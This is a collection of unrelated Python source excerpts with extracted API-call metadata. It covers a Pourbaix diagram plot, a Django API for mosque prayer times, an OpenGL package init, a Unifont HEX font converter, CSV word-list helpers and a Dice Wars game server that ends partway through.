ax.plot(pHArray[:], muH[:],'c--',label='$H_2$',linewidth=1)
ax.plot(pHArray[:], muH2O[:],'b--',label='$H_2O$', linewidth=1)
plt.ylabel('Electric Potential, E(V)')
plt.xlabel('pH')
plt.title(r'Bi-Cu-S Pourbaix Diagram, $\eta_{Bi,Cu,S}=10^{-'+str(eta)+'}$, '+str(composition[0])+'Cu:' +str(composition[1])+'Bi:'+str(composition[2])+'S')
chartBox=ax.get_position()
ax.set_position([chartBox.x0, chartBox.y0, chartBox.width*1.5, chartBox.height*1.5])
ax.legend(loc='upper center', bbox_to_anchor=(1.3, 0.9), ncol=1)
plt.show()
print('End of Script')
|
[
"matplotlib.pyplot.subplot",
"numpy.load",
"numpy.save",
"matplotlib.pyplot.show",
"numpy.log",
"numpy.asarray",
"numpy.zeros",
"random.random",
"matplotlib.pyplot.figure",
"numpy.sort",
"numpy.array",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"numpy.linalg.solve"
] |
[((734, 753), 'numpy.array', 'np.array', (['[1, 1, 1]'], {}), '([1, 1, 1])\n', (742, 753), True, 'import numpy as np\n'), ((10420, 10437), 'numpy.zeros', 'np.zeros', (['(65, 8)'], {}), '((65, 8))\n', (10428, 10437), True, 'import numpy as np\n'), ((27784, 27811), 'numpy.zeros', 'np.zeros', (['(n + 1, n + 1, 4)'], {}), '((n + 1, n + 1, 4))\n', (27792, 27811), True, 'import numpy as np\n'), ((27908, 27924), 'numpy.zeros', 'np.zeros', (['(3, 1)'], {}), '((3, 1))\n', (27916, 27924), True, 'import numpy as np\n'), ((31114, 31131), 'numpy.zeros', 'np.zeros', (['(50, 6)'], {}), '((50, 6))\n', (31122, 31131), True, 'import numpy as np\n'), ((31223, 31235), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (31233, 31235), True, 'import matplotlib.pyplot as plt\n'), ((31239, 31255), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (31250, 31255), True, 'import matplotlib.pyplot as plt\n'), ((31261, 31270), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (31268, 31270), True, 'import matplotlib.pyplot as plt\n'), ((33846, 33867), 'numpy.zeros', 'np.zeros', (['(pHrange + 1)'], {}), '(pHrange + 1)\n', (33854, 33867), True, 'import numpy as np\n'), ((33875, 33896), 'numpy.zeros', 'np.zeros', (['(pHrange + 1)'], {}), '(pHrange + 1)\n', (33883, 33896), True, 'import numpy as np\n'), ((33906, 33927), 'numpy.zeros', 'np.zeros', (['(pHrange + 1)'], {}), '(pHrange + 1)\n', (33914, 33927), True, 'import numpy as np\n'), ((34443, 34481), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Electric Potential, E(V)"""'], {}), "('Electric Potential, E(V)')\n", (34453, 34481), True, 'import matplotlib.pyplot as plt\n'), ((34482, 34498), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""pH"""'], {}), "('pH')\n", (34492, 34498), True, 'import matplotlib.pyplot as plt\n'), ((34902, 34919), 'numpy.zeros', 'np.zeros', (['(50, 6)'], {}), '((50, 6))\n', (34910, 34919), True, 'import numpy as np\n'), ((35011, 35023), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (35021, 35023), True, 'import matplotlib.pyplot as plt\n'), ((35027, 35043), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (35038, 35043), True, 'import matplotlib.pyplot as plt\n'), ((35049, 35058), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (35056, 35058), True, 'import matplotlib.pyplot as plt\n'), ((36055, 36093), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Electric Potential, E(V)"""'], {}), "('Electric Potential, E(V)')\n", (36065, 36093), True, 'import matplotlib.pyplot as plt\n'), ((36094, 36110), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""pH"""'], {}), "('pH')\n", (36104, 36110), True, 'import matplotlib.pyplot as plt\n'), ((36442, 36452), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (36450, 36452), True, 'import matplotlib.pyplot as plt\n'), ((20454, 20485), 'numpy.load', 'load', (['"""BiCuOS-speciesCombo.npy"""'], {}), "('BiCuOS-speciesCombo.npy')\n", (20458, 20485), False, 'from numpy import load\n'), ((20494, 20526), 'numpy.load', 'load', (['"""BiCuOS-numberSpecies.npy"""'], {}), "('BiCuOS-numberSpecies.npy')\n", (20498, 20526), False, 'from numpy import load\n'), ((20893, 20904), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (20901, 20904), True, 'import numpy as np\n'), ((20918, 20941), 'numpy.zeros', 'np.zeros', (['(45000, 9, 3)'], {}), '((45000, 9, 3))\n', (20926, 20941), True, 'import numpy as np\n'), ((27010, 27049), 'numpy.save', 'save', (['"""BiCuOS-speciesCombo.npy"""', 'combos'], {}), "('BiCuOS-speciesCombo.npy', combos)\n", (27014, 
27049), False, 'from numpy import save\n'), ((27087, 27109), 'numpy.asarray', 'asarray', (['[[combo_num]]'], {}), '([[combo_num]])\n', (27094, 27109), False, 'from numpy import asarray\n'), ((33537, 33552), 'random.random', 'random.random', ([], {}), '()\n', (33550, 33552), False, 'import random\n'), ((33582, 33597), 'random.random', 'random.random', ([], {}), '()\n', (33595, 33597), False, 'import random\n'), ((33627, 33642), 'random.random', 'random.random', ([], {}), '()\n', (33640, 33642), False, 'import random\n'), ((30404, 30423), 'numpy.sort', 'np.sort', (['sort[:, 0]'], {}), '(sort[:, 0])\n', (30411, 30423), True, 'import numpy as np\n'), ((28790, 28800), 'numpy.log', 'np.log', (['nI'], {}), '(nI)\n', (28796, 28800), True, 'import numpy as np\n'), ((29367, 29377), 'numpy.log', 'np.log', (['nI'], {}), '(nI)\n', (29373, 29377), True, 'import numpy as np\n'), ((29954, 29964), 'numpy.log', 'np.log', (['nI'], {}), '(nI)\n', (29960, 29964), True, 'import numpy as np\n'), ((21582, 21741), 'numpy.array', 'np.array', (['[[species[k, 3], species[m, 3], species[p, 3]], [species[k, 4], species[m, \n 4], species[p, 4]], [species[k, 5], species[m, 5], species[p, 5]]]'], {}), '([[species[k, 3], species[m, 3], species[p, 3]], [species[k, 4],\n species[m, 4], species[p, 4]], [species[k, 5], species[m, 5], species[p,\n 5]]])\n', (21590, 21741), True, 'import numpy as np\n'), ((28683, 28695), 'numpy.log', 'np.log', (['(10.0)'], {}), '(10.0)\n', (28689, 28695), True, 'import numpy as np\n'), ((29260, 29272), 'numpy.log', 'np.log', (['(10.0)'], {}), '(10.0)\n', (29266, 29272), True, 'import numpy as np\n'), ((29847, 29859), 'numpy.log', 'np.log', (['(10.0)'], {}), '(10.0)\n', (29853, 29859), True, 'import numpy as np\n'), ((22820, 22851), 'numpy.linalg.solve', 'np.linalg.solve', (['a', 'composition'], {}), '(a, composition)\n', (22835, 22851), True, 'import numpy as np\n')]
|
from django.shortcuts import render
from .models import Masjid, SalahTime
from .serializers import MasjidSerializer, SalahTimeSerializer
from rest_framework import viewsets
from rest_framework.decorators import api_view
from masjid.models import Masjid
from rest_framework.response import Response
from rest_framework import status
from rest_framework_extensions.mixins import NestedViewSetMixin
from users.models import CustomUser
class MasjidViewSet(viewsets.ModelViewSet):
queryset = Masjid.objects.all()
serializer_class = MasjidSerializer
class SalahTimeViewSet(viewsets.ModelViewSet):
queryset = SalahTime.objects.all()
serializer_class = SalahTimeSerializer
@api_view(['GET'])
def getAllMasjid(request):
if request.method == 'GET':
masjids = Masjid.objects.all()
masjid_dict = {}
masjid_list = []
if masjids:
for obj in masjids:
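                # Gather the masjid's prayer times and owner's profile picture, tolerating missing records.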
masjid_id = obj.id
try:
salatime_obj = SalahTime.objects.get(masjid_id=masjid_id)
except SalahTime.DoesNotExist:
salatime_obj = None
try:
masjid_user = CustomUser.objects.get(id=obj.masjid_user)
except CustomUser.DoesNotExist:
masjid_user = None
salatime_obj_dict = {}
if salatime_obj:
salatime_obj_dict = {
"id": salatime_obj.id,
"fajar_azan":salatime_obj.fajar_azan ,
"fajar_prayer":salatime_obj.fajar_prayer ,
"dhuhr_azan":salatime_obj.Dhuhr_azan ,
"dhuhr_prayer":salatime_obj.Dhuhr_prayer ,
"asr_azan":salatime_obj.Asr_azan ,
"asr_prayer":salatime_obj.Asr_prayer ,
"maghrib_azan":salatime_obj.Maghrib_azan ,
"maghrib_prayer":salatime_obj.Maghrib_prayer ,
"isha_azan":salatime_obj.Isha_azan ,
"isha_prayer":salatime_obj.Isha_prayer ,
"jummah_azan":salatime_obj.jummah_azan ,
"jummah_prayer":salatime_obj.jummah_prayer ,
}
                if masjid_user and masjid_user.profile_pic:
masjid_dict = {
"id":obj.id,
"name":obj.name,
"address":obj.address,
"profile_pic":masjid_user.profile_pic.url,
"salatime": salatime_obj_dict,
}
masjid_list.append(masjid_dict)
else:
masjid_dict = {
"id":obj.id,
"name":obj.name,
"address":obj.address,
"profile_pic":None,
"salatime": salatime_obj_dict,
}
masjid_list.append(masjid_dict)
return Response({
"status": status.HTTP_200_OK,
"masjid_list":masjid_list
})
else:
return Response({
"status": status.HTTP_204_NO_CONTENT,
"message": "No any masjid found",
})
return Response({"message": "Method not allowed"})
|
[
"rest_framework.response.Response",
"rest_framework.decorators.api_view",
"masjid.models.Masjid.objects.all",
"users.models.CustomUser.objects.get"
] |
[((686, 703), 'rest_framework.decorators.api_view', 'api_view', (["['GET']"], {}), "(['GET'])\n", (694, 703), False, 'from rest_framework.decorators import api_view\n'), ((493, 513), 'masjid.models.Masjid.objects.all', 'Masjid.objects.all', ([], {}), '()\n', (511, 513), False, 'from masjid.models import Masjid\n'), ((3351, 3394), 'rest_framework.response.Response', 'Response', (["{'message': 'Method not allowed'}"], {}), "({'message': 'Method not allowed'})\n", (3359, 3394), False, 'from rest_framework.response import Response\n'), ((781, 801), 'masjid.models.Masjid.objects.all', 'Masjid.objects.all', ([], {}), '()\n', (799, 801), False, 'from masjid.models import Masjid\n'), ((3049, 3117), 'rest_framework.response.Response', 'Response', (["{'status': status.HTTP_200_OK, 'masjid_list': masjid_list}"], {}), "({'status': status.HTTP_200_OK, 'masjid_list': masjid_list})\n", (3057, 3117), False, 'from rest_framework.response import Response\n'), ((3197, 3283), 'rest_framework.response.Response', 'Response', (["{'status': status.HTTP_204_NO_CONTENT, 'message': 'No any masjid found'}"], {}), "({'status': status.HTTP_204_NO_CONTENT, 'message':\n 'No any masjid found'})\n", (3205, 3283), False, 'from rest_framework.response import Response\n'), ((1180, 1222), 'users.models.CustomUser.objects.get', 'CustomUser.objects.get', ([], {'id': 'obj.masjid_user'}), '(id=obj.masjid_user)\n', (1202, 1222), False, 'from users.models import CustomUser\n')]
|
# from .offscreen_context import OffscreenContext
import os
if os.environ.get("PYOPENGL_PLATFORM", None) == "egl":
from .egl_offscreen_context import OffscreenContext
else:
from .glfw_offscreen_context import OffscreenContext
from .fbo import Framebuffer
from .renderbuffer import Renderbuffer, RenderbufferMultisample
from .texture import (
Texture,
TextureMultisample,
Texture1D,
Texture3D,
loadTexture,
)
from .shader import Shader
from .shader_storage_buffer import ShaderStorage
from .vertexbuffer import Vertexbuffer
from .vao import VAO
from .ibo import IBO
from .ebo import EBO
from .camera import Camera
# from .window import Window
from .material import Material
from . import geometry as geo
from .tiles import tiles, tiles4
from . import meshutil
from . import utils
from . import glcontext
from . import glrenderer
|
[
"os.environ.get"
] |
[((64, 105), 'os.environ.get', 'os.environ.get', (['"""PYOPENGL_PLATFORM"""', 'None'], {}), "('PYOPENGL_PLATFORM', None)\n", (78, 105), False, 'import os\n')]
|
"""
monobit.hex - Unifont Hex format
(c) 2019--2021 <NAME>
licence: https://opensource.org/licenses/MIT
"""
# HEX format documentation
# http://czyborra.com/unifont/
import logging
import string
from ..storage import loaders, savers
from ..streams import FileFormatError
from ..font import Font
from ..glyph import Glyph
@loaders.register('hext', name='PC-BASIC Extended HEX')
def load_hext(instream, where=None):
"""Load 8xN multi-cell font from PC-BASIC extended .HEX file."""
return _load_hex(instream.text)
@loaders.register('hex', name='Unifont HEX')
def load_hex(instream, where=None):
"""Load 8x16 multi-cell font from Unifont .HEX file."""
return _load_hex(instream.text)
@savers.register(linked=load_hex)
def save_hex(fonts, outstream, where=None):
"""Save 8x16 multi-cell font to Unifont .HEX file."""
font = _validate(fonts)
_save_hex(font, outstream.text, _fits_in_hex)
@savers.register(linked=load_hext)
def save_hext(fonts, outstream, where=None):
"""Save 8xN multi-cell font to PC-BASIC extended .HEX file."""
font = _validate(fonts)
_save_hex(font, outstream.text, _fits_in_hext)
def _validate(fonts):
"""Check if font fits in file format."""
if len(fonts) > 1:
raise FileFormatError('Can only save one font to hex file.')
font, = fonts
if font.spacing not in ('character-cell', 'multi-cell'):
raise FileFormatError(
'This format only supports character-cell or multi-cell fonts.'
)
return font
##############################################################################
# loader
def _load_hex(instream):
"""Load font from a .hex file."""
global_comment = []
glyphs = []
comment = []
for line in instream:
line = line.rstrip('\r\n')
if ':' in line:
# parse code line
key, value = line.rsplit(':', 1)
value = value.strip()
if (
# preserve empty lines if they separate comments
(not line and comment and comment[-1] != '')
# marked as comment
                or (line and line[0] == '#')
# pass through lines without : as comments - allows e.g. to convert diffs, like hexdraw
or (':' not in line)
# not a valid line, treat as comment
or set(value) - set(string.hexdigits + ',')
):
comment.append(line)
else:
# when first glyph is found, split comment lines between global and glyph
if not glyphs and comment:
global_comment, comment = split_global_comment(comment)
glyphs.append(_convert_glyph(key, value, comment))
comment = []
# preserve any comment at end of file as part of global comment
global_comment = '\n'.join([*_clean_comment(global_comment), *_clean_comment(comment)])
return Font(glyphs, comments=global_comment, properties=dict(encoding='unicode'))
def _convert_label(key):
"""Ctreate char label from key string."""
try:
return ''.join(chr(int(_key, 16)) for _key in key.split(','))
except ValueError:
return ''
def _convert_glyph(key, value, comment):
"""Create Glyph object from key string and hex value."""
# determine geometry
# two standards: 8-pix wide, or 16-pix wide
# if height >= 32, they conflict
num_bytes = len(value) // 2
if num_bytes < 32:
width, height = 8, num_bytes
else:
width, height = 16, num_bytes // 2
# get labels
char = _convert_label(key)
return Glyph.from_hex(value, width, height).modify(
char=char, tags=([key] if not char else []),
comments=_clean_comment(comment)
)
def _clean_comment(lines):
"""Remove leading characters from comment."""
while lines and not lines[-1]:
lines = lines[:-1]
if not lines:
return []
lines = [_line or '' for _line in lines]
# remove "comment char" - non-alphanumeric shared first character
firsts = str(set(_line[0:1] for _line in lines if _line))
if len(firsts) == 1 and firsts not in string.ascii_letters + string.digits:
lines = [_line[1:] for _line in lines]
# remove one leading space
if all(_line.startswith(' ') for _line in lines if _line):
lines = [_line[1:] for _line in lines]
return lines
def split_global_comment(lines):
"""Split top comments into global and first glyph comment."""
while lines and not lines[-1]:
lines = lines[:-1]
try:
splitter = lines[::-1].index('')
except ValueError:
global_comment = lines
lines = []
else:
global_comment = lines[:-splitter-1]
lines = lines[-splitter:]
return global_comment, lines
##############################################################################
# saver
def _save_hex(font, outstream, fits):
"""Save 8x16 multi-cell font to Unifont or PC-BASIC Extended .HEX file."""
# global comment
if font.get_comments():
outstream.write(_format_comment(font.get_comments(), comm_char='#') + '\n\n')
# glyphs
for glyph in font.glyphs:
if fits(glyph):
outstream.write(_format_glyph(glyph))
else:
logging.warning('Skipping %s: %s', glyph.char, glyph.as_hex())
def _fits_in_hex(glyph):
"""Check if glyph fits in Unifont Hex format."""
if len(glyph.char) > 1:
logging.warning('Hex format does not support multi-codepoint grapheme clusters.')
return False
if glyph.height != 16 or glyph.width not in (8, 16):
logging.warning(
'Hex format only supports 8x16 or 16x16 glyphs, '
f'glyph {glyph.char} is {glyph.width}x{glyph.height}.'
)
return False
return True
def _fits_in_hext(glyph):
"""Check if glyph fits in PC-BASIC Extended Hex format."""
if glyph.width not in (8, 16):
logging.warning(
'Extended Hex format only supports glyphs of width 8 or 16 pixels, '
f'glyph {glyph.char} is {glyph.width}x{glyph.height}.'
)
return False
if glyph.height >= 32:
logging.warning(
'Extended Hex format only supports glyphs less than 32 pixels high, '
f'glyph {glyph.char} is {glyph.width}x{glyph.height}.'
)
return False
return True
def _format_glyph(glyph):
"""Format glyph line for hex file."""
return (
# glyph comment
('' if not glyph.comments else '\n' + _format_comment(glyph.comments, comm_char='#') + '\n')
+ '{}:{}\n'.format(
# label
u','.join(f'{ord(_c):04X}' for _c in glyph.char),
# hex code
glyph.as_hex().upper()
)
)
def _format_comment(comment, comm_char):
"""Format a multiline comment."""
return '\n'.join(f'{comm_char} {_line}' for _line in comment.splitlines())
|
[
"logging.warning"
] |
[((5444, 5530), 'logging.warning', 'logging.warning', (['"""Hex format does not support multi-codepoint grapheme clusters."""'], {}), "(\n 'Hex format does not support multi-codepoint grapheme clusters.')\n", (5459, 5530), False, 'import logging\n'), ((5612, 5740), 'logging.warning', 'logging.warning', (['f"""Hex format only supports 8x16 or 16x16 glyphs, glyph {glyph.char} is {glyph.width}x{glyph.height}."""'], {}), "(\n f'Hex format only supports 8x16 or 16x16 glyphs, glyph {glyph.char} is {glyph.width}x{glyph.height}.'\n )\n", (5627, 5740), False, 'import logging\n'), ((5938, 6085), 'logging.warning', 'logging.warning', (['f"""Extended Hex format only supports glyphs of width 8 or 16 pixels, glyph {glyph.char} is {glyph.width}x{glyph.height}."""'], {}), "(\n f'Extended Hex format only supports glyphs of width 8 or 16 pixels, glyph {glyph.char} is {glyph.width}x{glyph.height}.'\n )\n", (5953, 6085), False, 'import logging\n'), ((6169, 6317), 'logging.warning', 'logging.warning', (['f"""Extended Hex format only supports glyphs less than 32 pixels high, glyph {glyph.char} is {glyph.width}x{glyph.height}."""'], {}), "(\n f'Extended Hex format only supports glyphs less than 32 pixels high, glyph {glyph.char} is {glyph.width}x{glyph.height}.'\n )\n", (6184, 6317), False, 'import logging\n')]
|
import csv
def open_file_or_create(name: str, mode):
try:
return open(name, mode)
    except FileNotFoundError:
        # create the file first, then retry with the requested mode
        f = open(name, 'a')
        f.close()
        return open(name, mode)
def import_csv(words_list: list, class_name, filename = 'data.csv'):
csv_file = open_file_or_create(filename, 'r')
csv_reader = csv.DictReader(csv_file)
for line in csv_reader:
word = line['word']
translate = line['translate']
        is_learned = line['is_learned'] == 'True'
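        # 'answers' is stored as a stringified list, e.g. "[True, False, True]"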
answers = line['answers'][1:-1].replace(' ', '').split(',')
        for i in range(len(answers)):
            if answers[i] == 'True':
                answers[i] = True
            elif answers[i] == 'False':
                answers[i] = False
            else:
                # malformed entry (e.g. the empty string left by an empty list):
                # drop all answers and stop before indexing past the new length
                answers = []
                break
words_list.append(class_name(word=word, translate=translate, is_learned=is_learned, answers=answers))
csv_file.close()
def export_csv(words_list: list, file_name='data.csv'):
    # nothing to write (and no fieldnames to derive) from an empty list
    if not words_list:
        return
    csv_file = open_file_or_create(file_name, 'w')
    csv_writer = csv.DictWriter(csv_file, fieldnames=words_list[0].__dict__.keys())
csv_writer.writeheader()
for i in range(len(words_list)):
csv_writer.writerow(words_list[i].__dict__)
csv_file.close()
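# Usage sketch (hypothetical): `Word` stands in for whatever class the caller
# passes as `class_name`; any object exposing word/translate/is_learned/answers
# through __dict__ round-trips through import_csv/export_csv.
if __name__ == '__main__':
    class Word:
        def __init__(self, word='', translate='', is_learned=False, answers=None):
            self.word = word
            self.translate = translate
            self.is_learned = is_learned
            self.answers = answers if answers is not None else []
    words = []
    import_csv(words, Word)
    words.append(Word('katze', 'cat'))
    export_csv(words)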
|
[
"csv.DictReader"
] |
[((323, 347), 'csv.DictReader', 'csv.DictReader', (['csv_file'], {}), '(csv_file)\n', (337, 347), False, 'import csv\n')]
|
import json
from json.decoder import JSONDecodeError
import logging
import random
import socket
import sys
from .player import Player
from .summary import GameSummary
MAX_PASS_ROUNDS = 8
MAX_BATTLES_PER_GAME = 10000  # observed maximum of 5671 over 100k games
class Game:
"""Instance of the game
"""
def __init__(self, board, area_ownership, players, addr, port, nicknames_order):
"""Initialize game and connect clients
Parameters
----------
players : int
Number of players
addr : str
IP address of the server
port : int
Port number
Attributes
----------
buffer : int
Size of socket buffer
number_of_players : int
Number of players
"""
self.buffer = 65535
self.logger = logging.getLogger('SERVER')
self.address = addr
self.port = port
self.number_of_players = players
self.nb_players_alive = players
self.nb_consecutive_end_of_turns = 0
self.nb_battles = 0
self.create_socket()
self.board = board
self.initialize_players()
self.connect_clients()
if nicknames_order is not None:
self.adjust_player_order(nicknames_order)
self.report_player_order()
self.assign_areas_to_players(area_ownership)
self.logger.debug("Board initialized")
for player in self.players.values():
self.send_message(player, 'game_start')
self.summary = GameSummary()
def run(self):
"""Main loop of the game
"""
from dicewars.ml.game import serialise_game_configuration, save_game_configurations
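        # board snapshots serialised during play; written out with the winner's index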
configurations = set()
try:
for i in range(1, self.number_of_players + 1):
player = self.players[i]
self.send_message(player, 'game_state')
while True:
self.logger.debug("Current player {}".format(self.current_player.get_name()))
self.handle_player_turn()
if self.check_win_condition():
sys.stdout.write(str(self.summary))
for i, p in self.players.items():
if p.get_number_of_areas() == self.board.get_number_of_areas():
save_game_configurations(
winner_index=i,
configurations=configurations,
)
break
break
serialised_game = serialise_game_configuration(
board=self.board,
players=self.players,
)
configurations.add(serialised_game)
except KeyboardInterrupt:
self.logger.info("Game interrupted.")
for i in range(1, self.number_of_players + 1):
player = self.players[i]
self.send_message(player, 'close_socket')
except (BrokenPipeError, JSONDecodeError) as e:
self.logger.error("Connection to client failed: {0}".format(e))
except ConnectionResetError:
self.logger.error("ConnectionResetError")
try:
self.close_connections()
except BrokenPipeError:
pass
##############
# GAME LOGIC #
##############
def assign_area(self, area, player):
"""Assign area to a new owner
Parameters
----------
area : Area
Area to be assigned new owner to
player : Player
New owner
"""
area.set_owner_name(player.get_name())
player.add_area(area)
def handle_player_turn(self):
"""Handle clients message and carry out the action
"""
self.logger.debug("Handling player {} ({}) turn".format(self.current_player.get_name(), self.current_player.nickname))
player = self.current_player.get_name()
msg = self.get_message(player)
if msg['type'] == 'battle':
self.nb_consecutive_end_of_turns = 0
battle = self.battle(self.board.get_area_by_name(msg['atk']), self.board.get_area_by_name(msg['def']))
self.summary.add_battle()
self.logger.debug("Battle result: {}".format(battle))
for p in self.players:
self.send_message(self.players[p], 'battle', battle=battle)
elif msg['type'] == 'end_turn':
self.nb_consecutive_end_of_turns += 1
affected_areas = self.end_turn()
for p in self.players:
self.send_message(self.players[p], 'end_turn', areas=affected_areas)
def get_state(self):
"""Get game state
Returns
-------
dict
Dictionary containing owner, dice and adjacent areas of
each area, as well as score of each player
"""
game_state = {
'areas': {}
}
for a in self.board.areas:
area = self.board.areas[a]
game_state['areas'][area.name] = {
'adjacent_areas': area.get_adjacent_areas_names(),
'owner': area.get_owner_name(),
'dice': area.get_dice()
}
game_state['score'] = {}
for p in self.players:
player = self.players[p]
game_state['score'][player.get_name()] = player.get_largest_region(self.board)
return game_state
def battle(self, attacker, defender):
"""Carry out a battle
Returns
-------
dict
Dictionary with the result of the battle including information
about rolled numbers, dice left after the battle, and possible
new ownership of the areas
"""
self.nb_battles += 1
atk_dice = attacker.get_dice()
def_dice = defender.get_dice()
atk_pwr = def_pwr = 0
atk_name = attacker.get_owner_name()
def_name = defender.get_owner_name()
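        # each die contributes an independent uniform roll of 1-6 to its side's power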
for i in range(0, atk_dice):
atk_pwr += random.randint(1, 6)
for i in range(0, def_dice):
def_pwr += random.randint(1, 6)
battle = {
'atk': {
'name': attacker.get_name(),
'dice': 1,
'owner': atk_name,
'pwr': atk_pwr
}
}
attacker.set_dice(1)
if atk_pwr > def_pwr:
defender.set_owner_name(atk_name)
self.players[atk_name].add_area(defender)
self.players[def_name].remove_area(defender)
if self.players[def_name].get_number_of_areas() == 0:
self.eliminate_player(def_name)
attacker.set_dice(1)
defender.set_dice(atk_dice - 1)
battle['def'] = {
'name': defender.get_name(),
'dice': atk_dice - 1,
'owner': atk_name,
'pwr': def_pwr
}
else:
battle['def'] = {
'name': defender.get_name(),
'dice': def_dice,
'owner': def_name,
'pwr': def_pwr
}
return battle
def end_turn(self):
"""Handles end turn command
Returns
-------
dict
Dictionary of affected areas including number of dice in these areas
"""
affected_areas = []
player = self.current_player
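        # reinforcements = banked reserve + size of the player's largest connected region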
dice = player.get_reserve() + player.get_largest_region(self.board)
if dice > 64:
dice = 64
areas = []
for area in self.current_player.get_areas():
areas.append(area)
while dice and areas:
area = random.choice(areas)
if not area.add_die():
areas.remove(area)
else:
if area not in affected_areas:
affected_areas.append(area)
dice -= 1
player.set_reserve(dice)
self.set_next_player()
list_of_areas = {}
for area in affected_areas:
list_of_areas[area.get_name()] = {
'owner': area.get_owner_name(),
'dice': area.get_dice()
}
return list_of_areas
def set_first_player(self):
"""Set first player
"""
for player in self.players:
if self.players[player].get_name() == self.players_order[0]:
self.current_player = self.players[player]
self.logger.debug("Current player: {}".format(self.current_player.get_name()))
return
def set_next_player(self):
"""Set next player in order as a current player
"""
current_player_name = self.current_player.get_name()
current_idx = self.players_order.index(current_player_name)
idx = self.players_order[(current_idx + 1) % self.number_of_players]
while True:
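            # walk the order circularly, skipping players that have been eliminated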
try:
if self.players[idx].get_number_of_areas() == 0:
current_idx = (current_idx + 1) % self.number_of_players
idx = self.players_order[(current_idx + 1) % self.number_of_players]
continue
self.current_player = self.players[idx]
self.logger.debug("Current player: {}".format(self.current_player.get_name()))
except IndexError:
                sys.exit(1)
return
def eliminate_player(self, player):
nickname = self.players[player].get_nickname()
self.summary.add_elimination(nickname, self.summary.nb_battles)
self.logger.info("Eliminated player {} ({})".format(player, nickname))
self.nb_players_alive -= 1
def check_win_condition(self):
"""Check win conditions
Returns
-------
bool
True if a player has won, False otherwise
"""
if self.nb_consecutive_end_of_turns // self.nb_players_alive == MAX_PASS_ROUNDS:
self.logger.info("Game cancelled because the limit of {} rounds of passing has been reached".format(MAX_PASS_ROUNDS))
for p in self.players.values():
if p.get_number_of_areas() > 0:
self.eliminate_player(p.get_name())
self.process_win(None, -1)
return True
if self.nb_battles == MAX_BATTLES_PER_GAME:
self.logger.info("Game cancelled because the limit of {} battles has been reached".format(MAX_BATTLES_PER_GAME))
for p in self.players.values():
if p.get_number_of_areas() > 0:
self.eliminate_player(p.get_name())
self.process_win(None, -1)
return True
for p in self.players:
player = self.players[p]
if player.get_number_of_areas() == self.board.get_number_of_areas():
self.process_win(player.get_nickname(), player.get_name())
return True
return False
def process_win(self, player_nick, player_name):
self.summary.set_winner(player_nick)
self.logger.info("Player {} ({}) wins!".format(player_nick, player_name))
for i in self.players:
self.send_message(self.players[i], 'game_end', winner=player_name)
##############
# NETWORKING #
##############
def get_message(self, player):
"""Read message from client
Parameters
----------
player : int
Name of the client
Returns
-------
str
Decoded message from the client
"""
raw_message = self.client_sockets[player].recv(self.buffer)
msg = json.loads(raw_message.decode())
self.logger.debug("Got message from client {}; type: {}".format(player, msg['type']))
return msg
def send_message(self, client, type, battle=None, winner=None, areas=None):
"""Send message to a client
Parameters
----------
client : Player
            Recipient of the message
type : str
Type of message
battle : dict
Result of a battle
winner : int
Winner of the game
areas : list of int
Areas changed during the turn
"""
self.logger.debug("Sending msg type '{}' to client {}".format(type, client.get_name()))
if type == 'game_start':
msg = self.get_state()
msg['type'] = 'game_start'
msg['player'] = client.get_name()
msg['no_players'] = self.number_of_players
msg['current_player'] = self.current_player.get_name()
msg['board'] = self.board.get_board()
msg['order'] = self.players_order
elif type == 'game_state':
msg = self.get_state()
msg['type'] = 'game_state'
msg['player'] = client.get_name()
msg['no_players'] = self.number_of_players
msg['current_player'] = self.current_player.get_name()
elif type == 'battle':
msg = self.get_state()
msg['type'] = 'battle'
msg['result'] = battle
elif type == 'end_turn':
msg = self.get_state()
msg['type'] = 'end_turn'
msg['areas'] = areas
msg['current_player'] = self.current_player.get_name()
msg['reserves'] = {
i: self.players[i].get_reserve() for i in self.players
}
elif type == 'game_end':
msg = {
'type': 'game_end',
'winner': winner
}
elif type == 'close_socket':
msg = {'type': 'close_socket'}
msg = json.dumps(msg)
client.send_message(msg + '\0')
def create_socket(self):
"""Initiate server socket
"""
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind((self.address, self.port))
self.logger.debug("Server socket at {}:{}".format(self.address, self.port))
except OSError as e:
self.logger.error("Cannot create socket. {0}.".format(e))
            sys.exit(1)
def connect_clients(self):
"""Connect all clients
"""
self.client_sockets = {}
self.socket.listen(self.number_of_players)
self.logger.debug("Waiting for clients to connect")
for i in range(1, self.number_of_players + 1):
self.connect_client(i)
hello_msg = self.get_message(i)
if hello_msg['type'] != 'client_desc':
raise ValueError("Client send a wrong-type hello message '{}'".format(hello_msg))
self.players[i].set_nickname(hello_msg['nickname'])
self.logger.debug("Successfully assigned clients to all players")
def connect_client(self, i):
"""Assign client to an instance of Player
"""
sock, client_address = self.socket.accept()
self.add_client(sock, client_address, i)
def add_client(self, connection, client_address, i):
"""Add client's socket to an instance of Player
Parameters
----------
connection : socket
Client's socket
        client_address : (str, int)
Client's address and port number
i : int
Player's name
Returns
-------
Player
Instance of Player that the client was assigned to
"""
self.client_sockets[i] = connection
player = self.assign_player_to_client(connection, client_address)
if not player:
raise Exception("Could not assign player to client {}".format(client_address))
else:
return player
def assign_player_to_client(self, socket, client_address):
"""Add client's socket to an unassigned player
"""
player = self.get_unassigned_player()
if player:
player.assign_client(socket, client_address)
return player
else:
return False
def get_unassigned_player(self):
"""Get a player with unassigned client
"""
for player in self.players:
if not self.players[player].has_client():
return self.players[player]
return False
def close_connections(self):
"""Close server's socket
"""
self.logger.debug("Closing server socket")
self.socket.close()
##################
# INITIALIZATION #
##################
def initialize_players(self):
self.players = {}
